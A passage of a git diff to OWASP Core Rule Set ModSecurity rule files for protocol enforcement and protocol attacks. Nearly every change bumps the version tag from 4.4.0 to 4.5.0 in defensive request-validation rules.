REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ @@ -626,7 +626,7 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ 
@@ -645,7 +645,7 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.extension=.%{tx.1}/',\ chain" @@ -667,7 +667,7 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ @@ -686,7 +686,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ chain" 
@@ -707,7 +707,7 @@ SecRule REQUEST_HEADERS:Accept-Encoding "@gt 100" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*(?:[\s\x0b]*,[\s\x0b]*(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*)*$" \ @@ -723,7 +723,7 @@ SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\* tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQBODY_PROCESSOR "!@streq JSON" \ @@ -740,7 +740,7 @@ SecRule REQBODY_PROCESSOR "!@streq JSON" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ 
@@ -758,7 +758,7 @@ SecRule REQUEST_URI_RAW "@contains #" \ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ @@ -774,11 +774,11 @@ SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ phase:1,\ @@ -793,7 +793,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ @@ -812,7 +812,7 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ 
@@ -831,7 +831,7 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/120',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \ @@ -848,7 +848,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13, tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ @@ -865,7 +865,7 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" SecRule FILES_NAMES|FILES "@rx ['\";=]" \ @@ -882,7 +882,7 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ @@ -898,7 +898,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ @@ -920,7 +920,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ chain" 
@@ -940,15 +940,15 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BODY "@rx \x25" \ "chain" SecRule REQUEST_BODY "@validateUrlEncoding" \ "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ "id:920272,\ phase:2,\ @@ -963,7 +963,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:Accept "@eq 0" \ @@ -980,7 +980,7 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \ 
@@ -1001,7 +1001,7 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ @@ -1022,7 +1022,7 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \ @@ -1042,11 +1042,11 @@ SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?g tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920202,\ phase:1,\ 
@@ -1061,7 +1061,7 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ @@ -1080,7 +1080,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90 tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User|!REQUEST_HEADERS:Sec-CH-UA|!REQUEST_HEADERS:Sec-CH-UA-Mobile "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ @@ -1097,7 +1097,7 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(?:\?[01])?$" \ @@ -1114,7 +1114,7 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^( tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" \ 
@@ -1132,7 +1132,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdegh tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/153/267',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf index a0a119c..c4a4825 100644 --- a/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf +++ b/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+[^\s]+\s+http/\d" \ "id:921110,\ phase:2,\ 
@@ -24,7 +24,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -43,7 +43,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -62,7 +62,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -81,7 +81,7 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/273',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -100,7 +100,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -119,7 +119,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -137,7 +137,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -155,7 +155,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/136',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:application/(?:.+\+)?json|(?:application/(?:soap\+)?|text/)xml)" \ @@ -174,7 +174,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:applicati tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_URI "@rx unix:[^|]*\|" \ 
@@ -192,11 +192,11 @@ SecRule REQUEST_URI "@rx unix:[^|]*\|" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule ARGS_GET "@rx [\n\r]" \ "id:921151,\ phase:1,\ @@ -212,7 +212,7 @@ SecRule ARGS_GET "@rx [\n\r]" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -232,11 +232,11 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?\b(?:((?:tex
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153',\
 tag:'PCI/12.1',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 SecRule &REQUEST_HEADERS:Range "@gt 0" \
 "id:921230,\
 phase:1,\
@@ -251,7 +251,7 @@ SecRule &REQUEST_HEADERS:Range "@gt 0" \
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/210/272/220',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 SecRule ARGS_NAMES "@rx ." \
@@ -265,7 +265,7 @@ SecRule ARGS_NAMES "@rx ." \
 tag:'attack-protocol',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
 SecRule TX:/paramcounter_.*/ "@gt 1" \
 "id:921180,\
@@ -280,7 +280,7 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \
@@ -301,12 +301,12 @@ SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
